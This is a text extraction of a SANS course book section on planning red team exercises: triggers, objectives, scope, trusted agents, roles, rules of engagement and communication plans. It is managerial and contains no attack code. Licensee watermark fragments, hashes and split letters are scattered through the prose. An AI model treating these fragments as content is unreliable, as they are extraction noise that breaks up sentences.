Triggers: When and why is a Red Team Exercise being requested or proposed? Objectives: What are the objectives of the Adversary Emulation? Scope: Generally, the scope is large, but the test is blind to defenders. Trusted Agents: A limited number of stakeholders aware of the exercise. Some that receive daily updates to limit risk. Roles and Responsibilities: Multiple roles and responsibilities need to be assigned to ensure a professional, risk free assessment provides value to the organization. Rules of Engagement: The rules of engagement are not only for the Red Team but for all players and trusted agents so they are aware of what they can and can’t do as well as say.

nc o

• • • •

az

ze

The planning section will cover the following:

To :

ns

ed



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Li

ce

Resources: https://github.com/magoo/redteam-plan https://attack.mitre.org/tactics/TA0012/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

61

© SANS Institute 2020 Triggers

090aff33bcb6e401ded410120bc9a268 Red Team exercises may be triggered for multiple reasons: • New Threat Intelligence or Adversary

26 ,2 02 0

– Successful, documented attack – New Tactic, Technique, or Procedure (TTP)

• New people, process, and technology • Highlight, test, or expedite specific improvements • Regulatory requirement

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

62

ak

er

@ ya

ho

22829180 i< an

nm

Triggers Red Team exercises may be triggered for multiple reasons. Ultimately, it will be the responsibility of those in the governance role to determine if an adversary emulation should be performed.

Lincoln Mazzei nc o

ln

M

az

ze

New Threat Intelligence New threat intelligence may come in on a daily basis. Most organizations have a Threat Intelligence team that consumes that information and shares it with the required stakeholders. Indicators of Compromise (IoCs) are a top item that comes in through Threat Intelligence vendors or teams and distributed to Security Operations Center analysts and/or hunt teams. The Red Team should receive Threat Intelligence that is relevant, such as new vulnerabilities reported by vendors, exploits in the wild, public proof of concept code for a vulnerability, and any new Tactic, Technique, or Procedure (TTP). When breaches are detected and incident response is complete, many organizations share the analysis for other organizations to understand how the attack occurred. This can also be leveraged to perform an Adversary Emulation.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

New people, process, and technology It is normal for organizations to have staff turnover; new people enter while others exit. The new staff needs to be trained just like the previous one was trained. Organizations also change processes to become more efficient and leaner. These processes should be tested to ensure gaps were not introduced. Technology is also always evolving; an upgrade here, a new product there. These should be tested.

live

Highlight, test, or expedite specific improvements Retesting of past issues is generally a reason to perform a test. When many changes or improvements are introduced, Red Team should be able to validate. The business or organization says, “we fixed this issue.” Red Team trusts them but verifies by testing.

62

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Regulatory requirement As covered in the framework section, there are many regulatory entities creating frameworks for Red Team Adversary Emulation type testing. This will depend on the industry and jurisdiction the target organization operates in.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Reference: https://www.processexcellencenetwork.com/lean-six-sigma-business-performance/articles/12-essential-leanconcepts-and-tools

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

63

© SANS Institute 2020 Objectives

090aff33bcb6e401ded410120bc9a268 • The main objective is to accomplish the goal of the trigger • Adversaries have objectives:

26 ,2 02 0

– Financial Theft – Reputation Impact – Disable Infrastructure – Political motives

Ap ril

[email protected]

• Red Team Exercises are defined by goals and objectives as well

o.

co

m

>

– Ensure above do not occur or can be detected and remediated quickly – Train people and process; detect and prevent adversary attack

SEC564 | Red Team Exercises and Adversary Emulation

64

ak

er

@ ya

ho

22829180 i< an

nm

Exercise Objectives The main objective is to accomplish the goal of the trigger. Why is the Red Team performing an exercise or Adversary Emulation? Is it to test if a particular attack would work in the target organization? Determine the objective of that attack and you will have the objective for the Red Team.

ze

Lincoln Mazzei ln

M

Financial Theft: Modify queued wire transfers to redirect payments; steal financial data Reputation Impact and Loss of Market Share through DoS: Disable all company workstations Disable Infrastructure in Preparation for Kinetic Attack: Quickly cycle smart electric meters to overload grid Political motives • Provide propaganda support for political motive: Hijack television broadcast • Cause Terror in Regional Population: Change concentration of chemicals added to water supply

nc o

• • •

az

Adversaries may have many objectives

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Li

ce

ns

Red Team Exercises must have objectives as well The objective of the exercise is generally to ensure the above does not occur; to test if the above can be detected and remediated quickly; and to train people for better process or technology that detects and/or prevents the adversary attack.

live

64

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Scope

090aff33bcb6e401ded410120bc9a268 • Adversary Emulation (our focus) 26 ,2 02 0

– The adversary’s objectives – The specific location(s) to be targeted by the emulated adversary – The time frame of emulated attack activity – Mission-critical systems and process – For regulatory requirements, this may be regional systems

> m co o.

• New TTP or ad-hoc: Scope may be limited

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

65

ak

er

@ ya

ho

22829180 i< an

nm

Scope It is important to determine scope in the Planning Phase to avoid scope creep later on. Scope creep in project management refers to changes, continuous or uncontrolled growth in a project’s scope, at any point after the project begins. This can occur when the scope of a project is not properly defined, documented, or controlled.

ze

Lincoln Mazzei ln

Identify which adversary could have the capability, opportunity, and motive to launch an attack against the organization. The Threat Model for each organization will be different based on the industry, size, and location. Organizations new to Red Team Exercises and Adversary Emulations should start with less sophisticated actors to pilot the methodology and process. As exercises progress, more sophisticated actors may be chosen based on Threat Intelligence. The adversary’s objectives. As covered in the previous slide, adversaries have objectives, and this will be a clear factor for scoping the project. The specific location(s) to be targeted by the emulated adversary. Some adversaries are location or language-based. As we cover Threat Intelligence and understand how they operate, this will be evident with certain adversaries. The time frame of emulated attack activity. Time frames are important to determine for all phases of the exercise. Frequency of exercises will be discussed later. Mission-critical systems and process. Often, the scope will be the organization’s most critical systems. This will also be based on the Threat Intelligence and adversary being emulated. For regulatory requirements, this may be regional systems. As mentioned in the framework and methodology section, regulators are country or region based and may want to focus on regional systems within their jurisdiction.

nc o



M

az

Scope should be determined and approved by the organization’s governance agents. Some scope may be determined during the Planning Phase before the Threat Intelligence is performed while others require the Threat Intelligence.

• • •

ed

ns

ce



Li



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Reference: https://en.wikipedia.org/wiki/Scope_creep

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

65

© SANS Institute 2020 Scope: Scenario, TTPs, and Metrics

090aff33bcb6e401ded410120bc9a268 • The scenario for the exercise is based on the Threat Intelligence • Red Team may adjust TTPs to meet objectives • Engagements are not valuable without metrics

26 ,2 02 0

– Sequence of events adversaries take to meet objective – Tactics, Techniques, and Procedures used by the adversary

[email protected] m

>

Ap ril

– Determine what metrics will be obtained during the Planning Phase

o.

co

Documentation is critical to provide a high value Red Team Exercise proposal and report SEC564 | Red Team Exercises and Adversary Emulation

66

ak

er

@ ya

ho

22829180 i< an

nm

Scope: Scenario, TTPs, and Metrics Scenario The scenario may not have been established yet as that comes as part of the Threat Intelligence Phase. For this reason, we like including Threat Intelligence as a part of the Planning Phase. As we covered in the frameworks and methodologies section, there is no industry consensus on combining the two phases or putting one before the other. The scenario is defined as what steps or sequence of events the adversary took to reach their objective.

az

ze

Lincoln Mazzei nc o

ln

M

TTPs Based on the Threat Intelligence and adversary that will be emulated, Tactics, Techniques, and Procedures (TTPs) that the Red Team will perform are selected. TTPs may be adjusted to support a scenario and meet objectives. All TTPs that will be performed as well as the ones used/adjusted to meet the objective must be documented to obtain metrics.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Metrics Proper planning leads to a successful engagement where a Red Team is able to support a scenario, meet or try to meet the objectives, and obtain metrics. All of the actions are measured to understand the overall security stance of an organization’s defenses. Remember, these measurements are not only based on technical controls but can measure people, processes, and technology: • • • • • • • •

66

Time and TTPs to obtain initial access Time and TTPs that allowed moving laterally Time to detect TTPs; identify TTPs not prevented or detected Process and time to escalate events into incident Time to contain; Time to eradicate Process to engage hunt team Process to coordinate communications and alert leadership Process to corelate all events and realize sophisticated attack

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Scope: End-To-End Testing Model

090aff33bcb6e401ded410120bc9a268 Our focus in this class 26 ,2 02 0

• Red Team starts outside, just like any malicious attacker • Performs all steps of the Unified Kill Chain

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

67

ak

er

@ ya

ho

22829180 i< an

nm

Scope: End-To-End Testing Model The scope of this class will be an end-to-end adversary emulation. This means the Red Team is tasked with completing all the steps from the Unified Kill Chain starting on the outside, just like a real malicious attacker. An open end-to-end scope allows the Red Team to emulate a malicious actor, obtain a holistic view of the entire Unified Kill Chain, and answer the question “could this attack be successful against the target organization”.

az

ze

Lincoln Mazzei nc o

ln

M

Reference: https://www.csacademy.nl/images/scripties/2018/Paul-Pols---The-Unified-Kill-Chain.pdf

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

67

© SANS Institute 2020 Scope: Assumed Breach

090aff33bcb6e401ded410120bc9a268 Philosophy and understanding one will be breached 26 ,2 02 0

• Based on assumption an endpoint is already compromised • Answers “what can attacker do with this initial access” – Tests for malicious insider threat as well

[email protected] co

m

>

Ap ril

Start with a base build of OS and account just like a new hire Simulate a user being compromised, then emulate an adversary All other ATT&CK Tactics are in play See Red Siege’s Mike Saunders presentation

o.

• • • •

SEC564 | Red Team Exercises and Adversary Emulation

68

ak

er

@ ya

ho

22829180 i< an

nm

Scope: Assumed Breach Assume Breach is a philosophy that states rather than simply seeking to keep security incidents from occurring, it is critical to assume that a security incident can and will occur. Organizations cannot comprehensively identify gaps in security detection and response by solely focusing on breach prevention strategies (aka Initial Access). Understanding how to not only protect but also to detect and respond to breaches is just as important—if not more so—than taking action to prevent a breach from occurring in the first place.

az

ze

Lincoln Mazzei nc o

ln

M

With this understanding, Red Team Exercises can operate under the Assume Breach model. Meaning the Red Team will skip Initial Access and start with a base build of an operating system and a new account just like a new hire would on their first day. The Red Team is simulating a user being compromised (Initial Access) and then emulates the adversary across the rest of ATT&CK. This saves the Red Team time performing Red Team planning (covered shortly) and allows them to focus on post-exploitation.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://redsiege.com/abm

live

68

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Exercise Frequency

090aff33bcb6e401ded410120bc9a268 How often should Red Team Exercises be performed? 26 ,2 02 0

• Depends on multiple factors: target organization, size, triggers, regulatory requirements, and maturity level • Red Team engagements typically fall into these categories:

[email protected] o.

co

m

>

Ap ril

− Ad-hoc − Periodic – annual or semi-annual − Continuous – emulating the P in APT (persistence) − Short Red Team exercises are valuable as well to test a single TTP or attack pattern

SEC564 | Red Team Exercises and Adversary Emulation

69

ak

er

@ ya

ho

22829180 i< an

nm

Exercise Frequency How often should you Red Team? It depends! Based on the organization, size, regulations, and maturity level. Testing too often may not allow an organization to apply mitigations resulting in the same findings each time.

Lincoln Mazzei nc o

ln

M

az

ze

Ad-hoc For an organization starting an offensive security program, it is best to start with vulnerability scanning, vulnerability assessment, limited scope penetration testing, social engineering, and then get to Red Team Exercises. If planning is not managed and terms not agreed upon, an organization may turn a Red Team Exercise into a vulnerability assessment or penetration test. For this reason, it is important to understand the target organization and guide them through. A Red Team Exercise against an organization that has no idea what their threats and vulnerabilities are will be of little value to anyone.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

To :

Periodic Annual or Semi-Annual Adversary Emulation Red Team Exercises are common with Purple Team Exercises as replays in between. This allows the people and process to be trained on a quarterly basis while doing a blind test every 6-12 months.

Li

Continuous Continuous testing works toward a term Raphael “Mudge” first blogged about, “perfect knowledge.” It means obtaining detailed network map, passwords for key accounts, and knowledge about which users perform which activities that are of value to an adversary. This allows for emulating the persistence of the APT. It also allows the red team to roam in an open scope environment to test things that are not in scope of other ethical hacking requirements.

live

Reference: https://blog.cobaltstrike.com/2015/07/09/models-for-red-team-operations/ https://github.com/magoo/redteam-plan#baby-small-exercises

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

69

© SANS Institute 2020 Course Roadmap

Roles and Responsibilities

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

70

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

70

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Trusted Agents or White Team

090aff33bcb6e401ded410120bc9a268 • Trusted Agents are also called “White Team” or “White Cell” 26 ,2 02 0

• Limited people from within the target organization that know of the exercise – Keep the exercise as “need-to-know” as possible – When defenders realize there is an exercise, behavior changes

[email protected] o.

co

m

>

Ap ril

• Individuals whose daily roles and responsibilities put them in a position to contribute to reducing the risk of causing unintended impact to production systems and/or inaccurate senior and/or external escalation

SEC564 | Red Team Exercises and Adversary Emulation

71

ak

er

@ ya

ho

22829180 i< an

nm

Trusted Agents or White Team These two terms are used synonymously to mean individuals whose daily roles and responsibilities put them in a position to contribute to reducing the risk of causing unintended impact to production systems and/or inaccurate senior and/or external escalation. The group of individuals should be limited to “need-to-know” as behavior changes when people know it is an exercise.

az

ze

Lincoln Mazzei nc o

ln

M

Guidance from TIBER-EU The White Team or White Cell is the team, within the organization being tested, that is responsible for the overall planning and management of the test. The members of the White Team are the only people within the entity being tested that know an exercise is taking place. The White Team must ensure that the exercise is conducted in a controlled manner, with appropriate risk management controls in place, while maximizing the learning experience for the organization.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: TIBER-EU White Team Guidance: https://www.ecb.europa.eu/pub/pdf/other/ecb.tibereu.en.pdf

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

71

© SANS Institute 2020 Role

Responsibilities

090aff33bcb6e401ded410120bc9a268 Approve the attack scenario, the final report and remediation action items. Governance agents should also receive status updates throughout the exercise

Project Management

Coordinate entire Red Team Exercise including threat intelligence gathering; target reconnaissance; Testing Phase communication; and management of timeline and objectives

Threat Intelligence

Identify cyber threat actor(s) with the sophistication and desire to attack the organization; provide the group’s technical and behavioral profile including TTPs

Risk Avoidance

Receive daily updates on all Red Team actions and are responsible for avoiding or reducing the material impact of the exercise to business operations

Action Item Remediation Owners

Own actions related to remediation plan. Owners of Technology related findings will be privy to more briefings and overall action items than those that fall in the Exercise and Process categories as the need to know becomes lower and the risk of knowledge transfer becomes higher

26 ,2 02 0

Governance

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

72

ak

er

@ ya

ho

22829180 i< an

nm

Roles and Responsibilities Governance Trusted Agents who approve the attack scenario, the lessons learned report and the remediation plan. Governance agents should also receive status updates throughout the execution of the exercise (Testing Phase).

ze

Lincoln Mazzei ln

M

az

Project Management Trusted Agents who coordinate cyber threat intelligence gathering and victim reconnaissance; Testing Phase messaging to Governance agents; and management of timeline and objectives.

nc o

Threat Intelligence Trusted Agents who identify cyber threat actor group(s) with the sophistication and desire to attack the organization; provide the groups technical and behavioral profile and conduct adversary emulated reconnaissance via open source to identify

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Risk Avoidance Trusted Agents who receive daily updates on all Red Team actions and are responsible for avoiding or reducing the material impact of the exercise to business operations. Action Item Remediation Owners Trusted agents who own actions related to remediation findings. Owners of Technology related findings will be privy to more briefings and overall action items than those that fall in the Exercise Design and Process categories as the need to know becomes lower and the risk of knowledge transfer becomes higher.

live

72

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Governance

090aff33bcb6e401ded410120bc9a268 • Generally a committee but depends on organization: 26 ,2 02 0

– CEO or other C-Level(s), Head of Information Security, Head of Information Technology, Head of SOC or IR

• Approve Red Team Exercises – Approve and budget external parties • Threat Intelligence Vendor • Red Team Consultants – Objectives – Scope – Duration of exercise

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

73

ak

er

@ ya

ho

22829180 i< an

nm

Governance Governance is an area that security is wrangling with internally more than ever. Governance describes how different groups work with each other, report to each other, provide data and metrics to each other, etc. Governance, in this context, is defined as the governing body of an organization, particularly around information security and technology. Depending on the target organization, this may be made up of a CEO, CIO, CTO, CISO, or other C-Level, the Head of Information Technology, Head of Information Security, Head of Security Operations Center or Incident Response.

M

az

ze

Lincoln Mazzei nc o

ln

Governance Trusted Agents will be informed of the various phases of the exercise and approve the threat intelligence, planning, exercise execution, and exercise closure phases.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

Reference: http://www.businessdictionary.com/definition/governance.html

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

73

© SANS Institute 2020 Project Management or Exercise Coordinator

090aff33bcb6e401ded410120bc9a268 • Impartial staff with background in technology, cyber intelligence and Red Team Exercises that can facilitate all phases of Exercise 26 ,2 02 0

• Has the trust of senior leadership to mentor risk avoidance agents through their responsibilities and ensure the exercise continues with integrity and accurate observations • Leads and manages all forms of communication with Trusted Agents

Ap ril

[email protected] Closure

m

>

Planning and Approval Threat Intelligence product Daily Communication Exercise Closure

Planning

o.

co

Testing

ho

22829180

SEC564 | Red Team Exercises and Adversary Emulation

74

ak

er

@ ya

– – – –

Threat Intelligence

i< an

nm

Project Management or Exercise Coordinator Organizations should use project management best practices during Red Team Exercises, particularly during an adversary emulation. A project plan should outline the schedule for the different phases. The plan should be communicated to the trusted agents and closely adhered to and should have protocols in place if deviation from the plan becomes necessary. Since testing may occur in a production or non-production environment, project management planning is essential to avoid and mitigate operational risks.

az

ze

Lincoln Mazzei nc o

ln

M

The Project Manager should be an impartial staff of the organization with background in technology, cyber intelligence and Red Team Exercises that can facilitate all phases of Exercise. The PM should have the trust of senior leadership to mentor risk avoidance agents through their responsibilities and ensure the exercise continues with integrity and accurate observations.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

It is important that the Project Manager have great communication skills to lead and manage all forms of communication with Trusted Agents through all phases: Planning and Approval, Threat Intelligence product, Daily Communication, Exercise Closure.

live

74

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Project Management: Time Estimations

090aff33bcb6e401ded410120bc9a268 Time expectations are highly dependent on decisions made during the Planning Phase

Time Range

26 ,2 02 0

Phase

Weeks/Months

Threat Intelligence

[email protected] Weeks/Months

Attack Infrastructure

Days/Weeks

Execution

Weeks/Months

Response

Hours?/Days/Weeks

Red Team Reveal/Replay

Days/Weeks

Technology Remediation

Weeks/Months

o.

co

m

>

Ap ril

Planning

SEC564 | Red Team Exercises and Adversary Emulation

75

ak

er

@ ya

ho

22829180 i< an

nm

Project Management: Time Estimations Time expectations are highly dependent on decisions made for each phase but are particular to the Planning phase as governance agents must approve the exercise and budget. Both Threat Intelligence as well as the Planning Phase will assist the most in planning the time for the exercise.

ze

Lincoln Mazzei ln

M

az

Threat Intelligence (Weeks/Months): Understand the organization and provide valuable Threat Intelligence Planning (Weeks/Months): Planning the overall Red Team Exercise Attack Infrastructure (Days/Weeks): Depends if the Red Team must set up external infrastructure Execution (Weeks/Month): Time Red Team takes to achieve objective Response (Hours/Weeks): If the incident is discovered, the length of the immediate response Incident Response (Short Term) (Days / Weeks): The time to remove red team access, plug any discovered vulnerability, elimination of the adversary Red Team Reveal (Hours): Displaying the Red Team's actions to calibrate on IR realities Incident Response (Post-Mortem) (Hours / Days): Organization of the lessons learned and wide presentation Long Term Mitigation (Weeks/Months): Completion of harder lessons learned, strategic findings, and growth before you consider the next exercise

nc o

• • • • • •

ed

Li

ce



ns

• •

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Reference: https://github.com/magoo/redteam-plan#date-time-estimations

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

75

© SANS Institute 2020 Risk Avoidance

090aff33bcb6e401ded410120bc9a268 • Trusted Agents who will be notified in the event an incident is raised, which is related to the Red Team Exercise and falls within a business or communications process to which they have control or oversight. • Risk Avoidance Agents are expected to act accordingly to reduce the risk of unnecessary communications escalations and are responsible for contacting Governance Agents when they are unsure.

Head of IR

Head of SOC

26 ,2 02 0

Regional ISO

Project Manager

Ap ril

[email protected] Red Team Lead

Risk

o.

co

m

>

Head of IT

SEC564 | Red Team Exercises and Adversary Emulation

76

ak

er

@ ya

ho

22829180 i< an

nm

Risk Avoidance Trusted Agents who will be notified in the event an incident is raised, which is related to the Red Team Exercise and falls within a business or communications process to which they have control or oversight. Risk Avoidance Agents are expected to act accordingly to reduce the risk of unnecessary communications escalations and are responsible for contacting Governance Agents when they are unsure.

ze

Lincoln Mazzei nc o

ln

M

az

Risks are inherent during any type of security test but are particularly evident in an adversary emulation exercise. The possibility of causing a denial-of-service incident, unexpected system crash, damage to live critical systems, or the loss, modification, or disclosure of data highlight the need for active and robust risk management. To reduce the risks associated with testing, sufficient planning and coordination must take place beforehand, and should include agreements between the test subjects and testers on the Rules of Engagement. This would also include scope and, where required, a contractual arrangement covering the testing–including indemnification and liability provisions.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

Project Manager Head of Security Operations Center Head of Incident Response Head of Incident Handling Regional Information Security Officers Country Information Security Officers Red Team Lead

Li

• • • • • • •

ns

ed

Firms should develop an oversight group during the planning stages to manage the overall risk of the firm. Firms should conduct thorough due-diligence of in-scope systems prior to any testing to ensure that backups systems are in place, and recovery procedures are up to date and have been recently tested. Included in that group should be:

live

Apart from technical risk, the target organization is most likely in a jurisdiction requiring breach notification. It is important to monitor the exercise to ensure a regulator or government entity is not called about a data breach that was a Red Team Exercise. Reference: https://www.gfma.org/correspondence/gfma-framework-for-the-regulatory-use-of-penetration-testing-in-the-financial-servicesindustry/ 76

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Rules of Engagement

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

77

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

77

© SANS Institute 2020 Rules of Engagement (ROE)

090aff33bcb6e401ded410120bc9a268 Administrative

Technical

26 ,2 02 0

The Rules of Engagement establish the responsibility, relationship, and guidelines between the customer and testing firm (if applicable) and any stakeholders (Trusted Agents) required for exercise execution

Points of Contacts – trusted agents

Adversary Objectives

Testing Guidelines/Framework/Methodology

Functions and People

Project timelines

Assets

Communication Plan

Specific out of scope time

Reporting Mechanism

Specific out of scope areas/assets

Acceptance of liabilities, responsibilities, and risks

Activities to be conducted - Adversary Emulation Plan

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

78

ak

er

@ ya

ho

22829180 i< an

nm

Rules of Engagement (ROE) A rules of engagement (ROE) document should be created that clearly defines the testing parameters, approvals, and escalations. Often, the ROE is part of the overall planning document. Risks should be carefully managed throughout the Planning Phase. Higher risk activities can be managed by conducting tests off-hours, or against non-production systems (but testing parties should ensure these systems are operating with the same parameters of the production systems to ensure a valid test). The standard language and structure requirements for contracts with Red Team and adversary emulation testing vendors should include a clause for third-party testers to meet security and confidentiality requirements at least as stringent as those followed by the underlying institution for confidential information, including PII (personally identifiable information). These contracts should also include a clause related to data destruction requirements and breach notification provisions. An effective ROE outlines at a minimum the following:

nc o

ln

M

az

ze

Lincoln Mazzei

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

ce

ns

ed

Points of contact: Trusted agent(s), testers, and leadership–covered in Roles and Responsibilities section Testing guidelines: Covered in Framework and Methodologies section Projected timelines: Covered in planning and project management sections Communication Plan: Guidelines between trusted agents and testers Reporting mechanism: Covered in exercise closure phase Acceptance of liabilities, responsibilities, and risks

Li

• • • • • •

Li

Administrative:

live

Technical: • Adversary Objectives: Covered in Threat Intelligence section • Functions and People: Covered in Threat Intelligence section • Assets: Covered in Threat Intelligence and Planning section • Specific out-of-scope periods of time • Specific out-of-scope areas • Activities to be conducted during testing–Adversary Emulation Plan–covered in Threat Intelligence section Reference: https://www.gfma.org/correspondence/gfma-framework-for-the-regulatory-use-of-penetration-testing-in-thefinancial-services-industry/ 78

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Communication Plan

090aff33bcb6e401ded410120bc9a268 • Prior to test execution: Notify all trusted agents of 26 ,2 02 0

exercise, consider a training meeting • During testing

– Pick a time for sync ups (Daily at 9 a.m. EST) – Daily Situation Reports (SITREP)

[email protected] Ap ril

• After test execution

o.

co

m

>

– Notify all Trusted Agents and Players the exercise is over – Formal debrief, analysis of response, and remediation plan

SEC564 | Red Team Exercises and Adversary Emulation

79

ak

er

@ ya

ho

22829180 i< an

nm

Communication Plan Establishing a communication plan in the planning phase is important for the entire exercise.

Lincoln Mazzei nc o

ln

M

az

ze

Prior to the Exercise Prior to the start of the exercise, the rules of engagement document should be shared with all Trusted Agents followed by a conference to offer a platform for all questions and concerns. Expectations will be set regarding each Trusted Agent's roles and responsibilities, to include that of maintaining the integrity of the test. All players should receive a communication that will lay out expectations regarding response, in that all suspicious and malicious activity identified should be treated as real unless advised otherwise by a Trusted Agent. During the Exercise During the execution of the exercise, a daily call with all Trusted Agents will be scheduled; the call, however, will only take place if significant progress is made on behalf of the emulated adversary, or if a Blue Team response has been raised that is suspected to be the work of the emulated adversary. Calls should be scheduled at a set time each day.

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

After the Exercise Following the end of the test, Trusted Agents will receive an email stating that attack activity has stopped, but all processes, to include investigations and documentation must be worked through completion. It will be left to the discretion of Governance Trusted Agents as to whom the full report will be shared with internally. Findings received from the test, where appropriate, will be integrated into improvement plans. More of this will be covered in the Exercise Closure section.

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

79

© SANS Institute 2020 Player Rules

090aff33bcb6e401ded410120bc9a268 Both Red and Blue Team Players should have rules 26 ,2 02 0

• Red Team should not be limited, just like the adversaries are not • Blue Teams are to follow standard process throughout all incidents and investigations

[email protected] Ap ril

– SOC to escalate issues as “Business as Usual” – IR teams are to track incidents at regular pace

o.

co

m

>

• If Blue Teams become aware of exercise, trusted agents for those teams should step in and enforce that the process be followed • Communicating these rules is tricky for blind tests SEC564 | Red Team Exercises and Adversary Emulation

80

ak

er

@ ya

ho

22829180 i< an

nm

Player Rules One of the main differentiators of Red Team Exercises and Adversary Emulations is that the Red Team is not limited to constraints that are normal in other types of security tests. Adversaries will not have Rules of Engagement and to emulate the Adversary, the Red Team should not either. As organizations mature in security testing, they should be able to reach the level of little to no constraints against the Red Team

az

ze

Lincoln Mazzei nc o

ln

M

Blue Team Players should have rules, too! These rules should be around following the standard process, even if they suspect the events may be a Red Team Exercise. An example is to communicate something like: All investigations that would normally occur will occur regardless of whether they are related to a Red Team Exercise. Both processes should be carried out fully, with the caveat of communications. Specifically, when an incident and a subsequent Investigation are confirmed to be related to the Red Team Exercise, communications to regulators, ISOs and managers should divulge that information. Recommended language to include in those communications has been included below:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

This event/investigation [etc..] is related to a Red Team Exercise and at the conclusion of the test, will be closed as such, rather than calculated as an actual security incident. However, all individuals involved in detection, incident response, investigation and remediation are expected to react as they would if it were not a test or exercise, completing all processes. If Incident Managers or Responders become aware of the events correlation with a Red Team Exercise, team leaders and managers should immediately address the rumors with the following language:

live

As you were previously made aware, Red Team Exercises occur at undisclosed frequency. Whether a particular [phishing email, event, etc…] is related to a Red Team Exercise or not, is, and should, be irrelevant to our response. Senior leaders and our regulators are evaluating our ability to respond, contain and recover if necessary, which includes time to detect and mitigate, as well as ability to escalate and communicate internally. A person’s discovery that an event is related to a Red Team Exercise is not an accomplishment. Obscuring Red Team Exercise related information is only meant to ensure the integrity of the response evaluation. Please show both our leadership and our regulators that you are best in class in your positions and respond as you normally would. Should you have any questions, please feel free to contact me. 80

